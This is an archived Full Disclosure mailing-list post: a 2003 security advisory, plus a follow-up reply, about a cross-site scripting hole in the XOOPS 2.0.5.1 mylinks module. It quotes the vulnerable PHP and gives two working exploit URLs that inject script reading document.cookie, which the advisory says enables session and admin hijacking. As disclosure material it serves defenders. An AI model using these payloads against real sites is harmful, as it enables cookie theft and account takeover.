Full Disclosure mailing list archives

Re: XSS vulnerability in XOOPS 2.0.5.1


From: "Chintan Trivedi" <chesschintan () hotmail com>
Date: Fri, 21 Nov 2003 06:47:58 +0530

Another and easier way to exploit it will be 

http://[target]/modules/mylinks/myheader.php?url=";><script>alert(document.cookie)</script>

which will directly execute the script rather than waiting for the victim to click "Close Frame". Just a correction 
added. 


Chintan Trivedi 

  ----- Original Message ----- 
  From: Chintan Trivedi 
  To: full-disclosure () lists netsys com 
  Sent: Friday, November 21, 2003 5:40 AM
  Subject: [Full-disclosure] XSS vulnerability in XOOPS 2.0.5.1


  ====================================================================
  Advisory by Eye On Security Research Group - India www.eos-india.net 
  ====================================================================




  1...............................................................Product
  2...............................................................Vendor
  3.........................................................Vulnerability
  4.........................................................About Product
  5..............................................Details of vulnerability
  6..............................................................Exploit
  7..............................................................Credits




  1. Product 
  ==========

  XOOPS 2.0.5.1


  2. Vendor
  =========

  www.xoops.org


  3. Vulnerability
  ================

  XSS vulnerability in module weblinks


  4. About XOOPS
  ==============

  XOOPS is a dynamic OO (Object Oriented) based open source portal script written in PHP. XOOPS supports a number of 
databases, making XOOPS an ideal tool for developing small to large dynamic community websites, intra company portals, 
corporate portals, weblogs and much more. 


  5. Details of vulnerability
  ===========================

  The weblinks module contains a file named "myheader.php" in /modules/mylinks/ directory. The code of the file is as 
follow : 

  ---------------------------------
  include "../../mainfile.php";
  $url = $HTTP_GET_VARS['url'];
  $lid = intval($HTTP_GET_VARS['lid']);
  .
  .
  .
  <td class='bg4' align="center"><small>
  <a target="main" href="ratelink.php?cid=<? echo $cid; ?>&amp;lid=<? echo $lid; ?>"><? echo _MD_RATETHISSITE; ?></a> | 
<a target="main" href="modlink.php?lid=<? echo $lid; ?>"><? echo _MD_MODIFY; ?></a> | <a target="main" 
href="brokenlink.php?lid=<? echo $lid; ?>"><? echo _MD_REPORTBROKEN; ?></a> | <a target='_top' href='mailto:?subject=<? 
echo $mail_subject; ?>&body=<? echo $mail_body;?>'><? echo _MD_TELLAFRIEND; ?></a> | <a target='_top' href="<? echo 
XOOPS_URL; ?>">Back to <? echo $xoopsConfig['sitename']; ?></a> | <a target='_top' href="<? echo $url; ?>">Close 
Frame</a>
  </small>
  .
  .
  -----------------------------------

  The value for variable "url" is used in line 
  <a target='_top' href="<? echo $url; ?>">Close Frame</a>

  Thus an attacker can pass a javascript code as a value for variable url and get it executed as soon as the victim 
clicks the "Close Frame" link.


  6. Exploit
  ==========

  http://[target]/modules/mylinks/myheader.php?url=javascript:alert(document.cookie);

  Clicking the above link, the victim gets directed to a page containing a link "Close Frame" which is actually the 
javascript code inserted by the attacker. The cookie revealed is quite informatic for the attacker to login with the 
hijacked user (including admin) privileges. 


  7. Credits
  ==========

  Chintan Trivedi - http://www.hackersprogrammers.com
  "Eye on Security Research Group - India " - www.eos-india.net



Current thread: